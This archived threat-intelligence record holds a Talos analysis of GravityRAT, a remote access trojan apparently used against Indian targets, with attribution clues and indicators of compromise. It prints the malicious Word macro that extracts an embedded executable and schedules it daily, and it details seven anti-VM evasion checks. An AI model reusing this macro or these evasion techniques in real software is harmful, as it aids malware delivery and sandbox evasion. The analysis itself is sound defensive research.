{
	"id": "7b448b13-74a5-448d-b2fa-7a42cbe57d6d",
	"created_at": "2026-04-06T00:18:00.491608Z",
	"updated_at": "2026-04-10T03:19:59.210325Z",
	"deleted_at": null,
	"sha1_hash": "d5bc9d7c6f9be5687cc959fc6bc53693fe2c17c9",
	"title": "GravityRAT - The Two-Year Evolution Of An APT Targeting India",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 662598,
	"plain_text": "GravityRAT - The Two-Year Evolution Of An APT Targeting India\r\nBy Paul Rascagneres\r\nPublished: 2018-04-26 · Archived: 2026-04-05 20:16:17 UTC\r\nThursday, April 26, 2018 11:11\r\nThis blog post is authored by Warren Mercer and Paul Rascagneres.\r\nhttps://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html\r\nPage 1 of 15\n\nUpdate: 4/30 Since the publication of the blog post, one of the anti-VM capabilities was commented on a lot on\r\nTwitter: the detection of virtual machines by checking the temperature of the system. We decided to add more\r\ndetails and clarifications concerning this feature. GravityRAT uses a WMI request in order to get the current\r\ntemperature of the hardware. Here is the output of the query on a physical machine (a Surface Book):\r\nThe query returns the temperature of 7 thermal zones.\r\nHere is the output on a virtual machine executed by Hyper-V on the same hardware:\r\nThe feature is not supported. The malware author used this behavior in order to identify VMs (such as sandboxes).\r\nFrom our tests and the feedback from several researchers, this monitoring is not supported on Hyper-V, VMware\r\nFusion, VirtualBox, KVM and Xen. It's important to notice that several recent physical systems do not support it\r\n(a researcher reported some Lenovo and Dell hosts did not support this). It means that GravityRAT will consider\r\nthese physical machines as VMs. It is important to note that this check is not foolproof, as we have identified physical hosts\r\nwhich do not report back the temperature; however, it should also be considered a check that identifies a lot of\r\nvirtual environments. 
This is particularly important due to the amount of sandboxing \u0026 malware detonation being\r\ncarried out within virtual environments by researchers.\r\nSummary\r\nToday, Cisco Talos is uncovering a new piece of malware, which has remained\r\nunder the radar for the past two years while it continues to be developed. Several\r\nweeks ago, we identified the use of the latest version of this RAT (Remote Access\r\nTool). In this article, we will discuss the technical capabilities, the evolution,\r\ndevelopment and potential attribution of what we are calling GravityRAT.\r\nGravityRAT has been under ongoing development for at least 18 months, during which the developer has\r\nimplemented new features. We've seen file exfiltration, remote command execution capability and anti-VM\r\ntechniques added throughout the life of GravityRAT. This consistent evolution beyond standard remote code\r\nexecution is concerning because it shows determination and innovation by the actor.\r\nThroughout our investigation, we observed several malicious documents used to attack victims, which we will\r\ndiscuss. These malicious documents were used by the developer to run several tests on the popular analysis\r\nplatform VirusTotal. Using VirusTotal allowed the developer to make changes in an attempt to decrease antivirus\r\ndetection.\r\nAlthough GravityRAT has not been previously published or discussed, there was some information from the\r\nNational Computer Emergency Response Team (CERT) of India describing GravityRAT as being used in targeted\r\nattacks against India. Finally, we will discuss specific attribution elements discovered during our research into\r\nGravityRAT as we identify specific information, which we believe to be leaked by the developer, such as location,\r\nand potentially their first name.\r\nInfection Vectors\r\nMalicious Office Documents\r\nThe majority of the malicious documents crafted by the malware author are Microsoft Office\r\nWord documents. 
The attacker uses an embedded macro in order to execute malicious code on the\r\nvictim's system. The document opens and appears as such:\r\nThe document asks the user to enable macros in order to prove that the user is not a robot (similar to the\r\nCAPTCHA we often see on the internet). This, however, is a known tactic that a lot of Office-based malware uses.\r\nIt is an attempt to trick any users who are using Protected Mode on their systems. By enabling macros, the\r\nmalware is able to begin its execution. We discovered that the embedded macro is quite small when extracted.\r\nSub AutoOpen()\r\n If Not Dir(Environ(\"TEMP\") + \"\\image4.exe\") \u003c\u003e \"\" Then\r\n Const lCancelled_c As Long = 0\r\n Dim sSaveAsPath As String\r\n sSaveAsPath = CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%Temp%\") + \"\\temporary.zip\"\r\n If VBA.LenB(sSaveAsPath) = lCancelled_c Then Exit Sub\r\n ActiveDocument.Save\r\n Application.Documents.Add ActiveDocument.FullName\r\n ActiveDocument.SaveAs sSaveAsPath\r\n ActiveDocument.Close\r\n Set app = CreateObject(\"Shell.Application\")\r\n ExtractTo = CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%Temp%\")\r\n ExtractByExtension app.NameSpace(Environ(\"TEMP\") + \"\\temporary.zip\"), \"exe\", ExtractTo\r\n End If\r\nEnd Sub\r\nSub ExtractByExtension(fldr, ext, dst)\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n Set app = CreateObject(\"Shell.Application\")\r\n For Each f In fldr.Items\r\n If f.Type = \"File folder\" Then\r\n ExtractByExtension f.GetFolder, ext, dst\r\n ElseIf LCase(FSO.GetExtensionName(f.Name)) = LCase(ext) Then\r\n If Not Dir(Environ(\"TEMP\") + \"\\image4.exe\") \u003c\u003e \"\" Then\r\n app.NameSpace(dst).CopyHere f.Path, \u0026H4\r\n End If\r\n End If\r\n 
Next\r\n Shell \"schtasks /create /tn wordtest /tr \"\"'%temp%\\image4.exe' 35\"\" /sc DAILY /f /RI 10 /du 24:00 /st 00:01\"\r\nEnd Sub\r\nThis macro contains three functions:\r\nThe first one is executed when the document is opened. The purpose is to copy the active document (the\r\nopened Word document) to a temporary directory and to rename it as a ZIP archive. Indeed, the docx\r\nformat is, in fact, a common ZIP archive, and can be unzipped using common tools.\r\nThe second function decompresses this 'temporary.zip' file and extracts the .exe file stored in it.\r\nThe third creates a scheduled task, named 'wordtest', to execute this malicious file every day. With this\r\napproach, the attacker ensures that there is no direct execution (the executable is executed thanks to\r\nscheduled tasks), there's no download of an additional payload, and finally, the author uses the fact that the\r\ndocx format is an archive in order to include its executable (GravityRAT).\r\nTesting By The Author\r\nDuring our tracking, we identified several malicious documents submitted by this actor to\r\nVirusTotal for testing purposes. They tested the detection of macros (by modifying them, or by\r\nexecuting calc instead of the malicious payload) and the developers tried dynamic data\r\nexchange (DDE) execution in the Office document. This abuses the DDE protocol which exists\r\nwithin Microsoft Office documents. Whilst this is a feature Microsoft provides, it is also a feature\r\nthat an attacker can leverage for malicious activity; Microsoft previously published mitigation information\r\nhere. The developer crafted Office Word and Excel documents to see the detection in\r\nVirusTotal. The authors tried to hide the DDE object in different parts of the document — in the\r\nmain object and the header, for example. The DDE object simply executes Microsoft calc in the\r\ndetected sample. 
Here is an example:\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?\u003e\r\n\u003cw:document [...redacted...] mc:Ignorable=\"w14 w15 wp14\"\u003e\u003cw:body\u003e\u003cw:p w:rsidR=\"00215C91\" w:rsidRDefault=\"008C166\r\nWe believe the filenames of the submitted samples clearly indicate testing documents, using different methods and Office\r\ntricks to attempt to ensure their malware was undetected. Those names were:\r\ntestnew1.docx\r\nTest123.docx\r\ntest456.docx\r\ntest2.docx\r\nbook1test2.xlsx\r\nTest123.doc\r\nGravityRAT\r\nOur initial discovery of GravityRAT was through a malicious Word document. As\r\nexplained previously, this Word document had various macros to deliver a final\r\npayload. Considering that this was the most recent version of the malware, we\r\ndecided to ascertain how long this actor had been active, and how their attacks had\r\nevolved. We were able to discover four distinct versions of GravityRAT, developed\r\nover two years. Next, we will go through what we believe is the development life\r\ncycle and feature-addition mission carried out by this developer.\r\nVersion G1\r\nThe malware author uses a versioning system starting with the letter G. The oldest version we\r\nidentified is G1. Here is the PDB path of the sample:\r\nf:\\F\\Windows Work\\G1\\Adeel's Laptop\\G1 Main Virus\\systemInterrupts\\gravity\\obj\\x86\\Debug\\systemInterrupts.pdb\r\nYou can notice the potential first name of the developer: Adeel. Of course, this information can be manipulated\r\nby the malware author. This sample was compiled in December 2016. 
The original filename of the sample was\r\nresume.exe.\r\nThe purpose of this version was to steal information on the compromised system:\r\nMAC Address\r\nComputer name\r\nUsername\r\nIP address\r\nDate\r\nFiles with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf and .pdf\r\nThe volumes mapped on the system\r\nAll this information was then sent to one of the following domains:\r\nG1 also had the ability to execute commands remotely on the infected host machine at the author's will.\r\nVersion G2\r\nWe identified a new variant used in July 2017 named G2. Here is the PDB of the sample:\r\ne:\\Windows Work\\G2\\G2 Main Virus\\Microsoft Virus Solutions (G2 v5) (Current)\\Microsoft Virus Solutions\\obj\\Debu\r\nFor this version, the developer modified the architecture of the malware. The main code aims to load and execute\r\ntwo additional .NET binaries stored in the resources of the file:\r\nThe first resource is a legitimate open-source library available on GitHub. It's a .NET wrapper for the\r\nWindows Task Scheduler\r\nThe second is the G2 version of GravityRAT\r\nThis variant shares the same command and control (C2) servers as G1; however, an additional\r\n'payload' variable is added in G2.\r\nThis variant has almost identical capabilities to the previous one, with one additional function: it collects the\r\nCPU information from the Win32_Processor entry via a WMI request (Processor ID, Name, Manufacturer and the\r\nclock speed). The attacker is most likely using this information as part of an anti-VM attempt within this malware.\r\nThis is used to try and thwart analysis in virtual environments.\r\nIn a slight change to the previous variant, the new payloads are executed with a Windows Scheduled Task. 
This\r\nwould explain the inclusion of the .NET wrapper.\r\nThe analysed sample contained a decoy picture document in the resource section:\r\nVersion G3\r\nIn August 2017, the author of GravityRAT used a new variant of their malware, G3. Here is the\r\nPDB:\r\nF:\\Projects\\g3\\G3 Version 4.0\\G3\\G3\\obj\\Release\\Intel Core.pdb\r\nThis variant uses the same method as G2, and includes a legitimate library in the resource section. The developers\r\nalso added additional language support to the library:\r\nGerman\r\nSpanish\r\nFrench\r\nItalian\r\nChinese\r\nThe author changed the backend of the C2 server with this variant. The URI changed too; it now contains the\r\nGravityRAT variant name:\r\nAugust was also the same month NIC CERT notified potential victims that GravityRAT had been used in a\r\ntargeted campaign. Given the ongoing development nature of this malware, it meant another variant was most\r\nlikely due.\r\nVersion GX\r\nThe latest version of GravityRAT, named GX, was created in December 2017. Here is the PDB:\r\nC:\\Users\\The Invincible\\Desktop\\gx\\gx-current-program\\LSASS\\obj\\Release\\LSASS.pdb\r\nThis version is the most advanced variant of GravityRAT. Throughout the evolution, we saw this malware\r\nembedding legitimate open-source .NET libraries (for scheduled tasks, compression, encryption, .NET loading). 
It\r\ncontains a resource named \"important.\" This is a password-protected archive.\r\nThis variant has the same features as before, but this time, some new features are added:\r\nIt collects open ports on the victim host by running the netstat command\r\nIt lists all the running processes\r\nIt lists available services on the system\r\nIt exfiltrates .ppt and .pptx files, in addition to the extensions mentioned in the G1 variant\r\nIf a USB key is connected to the system, the malware steals files based on an extension list\r\nIt supports file encryption (AES with the key \"lolomycin2017\")\r\nIt collects information on the account (account type, description, domain name, full name, SID and status)\r\nIt checks if the system is a virtual machine with several techniques\r\nThe developer implemented a total of seven techniques to identify if the compromised system is a virtual machine.\r\nThe first technique consists of looking for any additional tools used by the hypervisor that are installed on the\r\nsystem (by checking a registry key):\r\nThe second technique uses a WMI request for the BIOS version (Win32_BIOS entry). If the response contains\r\n\"VMware\", \"Virtual\", \"XEN\", \"Xen\" or \"A M I\", the system is considered a virtual machine. Additionally, the\r\nmalware checks the SerialNumber and the version of the BIOS.\r\nThe third technique uses the Win32_Computer entry in WMI. It checks if the manufacturer contains \"VIRTUAL\",\r\n\"VMWARE\" or \"VirtualBox\".\r\nThe fourth technique checks the Processor ID of the system.\r\nThe fifth technique counts the number of cores in the infected system (the author expects more than one core).\r\nThe sixth technique checks the current CPU temperature of the system (the MSAcpi_ThermalZoneTemperature\r\nentry). 
Indeed, some hypervisors (VMware, VirtualBox and Hyper-V) do not support temperature checks. The\r\nWMI request simply replies \"not supported\". This behaviour can be used to detect if the targeted system is a real\r\nmachine.\r\nThe last technique uses the MAC Address of the infected system. If the MAC Address starts with a well-known\r\nhexadecimal prefix, the system is identified as a virtual machine.\r\nC2 server communication is performed over HTTP, as it was previously. The variant name, GX, is used in\r\nthe URI. The C2 servers we can see are shared with the previous variants:\r\nWhat we know about the author\r\nBelow, we will present evidence that we have obtained regarding the attacker and\r\nthe associated malware. Obviously, attribution is a complex field. The developers\r\ncould be using a proxy or a VPN in order to fake the origin of the submission. But,\r\nwe will still simply present some facts concerning this actor.\r\nThe developer used at least two different usernames in the past two years: \"The Invincible\" and \"TheMartian.\" In\r\nthe oldest version of GravityRAT, the attacker potentially leaked his or her first name in the PDB: \"Adeel\" — the\r\npath contained \"Adeel's Laptop\". Additionally, all the malicious Office documents, and more specifically the\r\ndocuments used to test anti-virus on VirusTotal, were submitted from Pakistan. One of the four PE files in the\r\nIOCs section was sent from Pakistan, too.\r\nIn August 2017, NIC CERT published an advisory about malicious targeted campaigns. This advisory mentions\r\nthe C2 server infrastructure of GravityRAT, which means the GravityRAT author likely targeted Indian\r\nentities/organisations. 
By leveraging Cisco Umbrella and using the Investigate tool, we were able to determine\r\nthat, across all of the C2 domains listed, there was a large influx of traffic originating from India. Consistent with\r\nthe NIC CERT advisory, all of the C2 domains were at least 50 percent requested by Indian IP infrastructure. It is possible that\r\nsome of the non-Indian IP space requests may be artefacts of our own research.\r\nConclusion\r\nThis actor is probably not the most advanced actor we've seen. But he or she\r\nmanaged to stay under the radar since 2016. They worked on malicious code, and\r\nproduced four variants. Each new variant included new features. The developer\r\nused the same C2 infrastructure all this time. The developer was clever enough to\r\nkeep this infrastructure safe, and not have it blocklisted by a security vendor. The\r\nactor took their time to ensure they were not within a virtual environment to avoid\r\nanalysis. However, they did not take any time at all to attempt to obfuscate their\r\n.NET code. The code was largely trivial to reverse engineer, which meant static\r\nanalysis was an easy option for this piece of malware.\r\nNIC CERT published an advisory about this actor, which suggests they targeted Indian entities and organizations.\r\nThe author leaked information within the samples (i.e. Adeel) and on the VirusTotal platform. Thanks to this\r\ninformation, we were able to understand how they tested malicious documents in order to decrease detection ratios\r\nacross many popular engines. 
During this testing period, all the samples were uploaded from Pakistan to\r\nVirusTotal.\r\nCoverage\r\nAdditional ways our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors.\r\nCWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with\r\nthis threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nMalicious Documents\r\nMacros\r\nOther Malicious 
Documents (DDE)\r\nGravityRAT\r\nG1 9f30163c0fe99825022649c5a066a4c972b76210368531d0cfa4c1736c32fb3a\r\nG2 1993f8d2606c83e22a262ac93cc9f69f972c04460831115b57b3f6244ac128bc\r\nG3 99dd67915566c0951b78d323bb066eb5b130cc7ebd6355ec0338469876503f90\r\nGX 1c0ea462f0bbd7acfdf4c6daf3cb8ce09e1375b766fbd3ff89f40c0aa3f4fc96\r\nC2 Servers\r\nURI:\r\nSource: https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html"
	],
	"report_names": [
		"gravityrat-two-year-evolution-of-apt.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434680,
	"ts_updated_at": 1775791199,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d5bc9d7c6f9be5687cc959fc6bc53693fe2c17c9.pdf",
		"text": "https://archive.orkl.eu/d5bc9d7c6f9be5687cc959fc6bc53693fe2c17c9.txt",
		"img": "https://archive.orkl.eu/d5bc9d7c6f9be5687cc959fc6bc53693fe2c17c9.jpg"
	}
}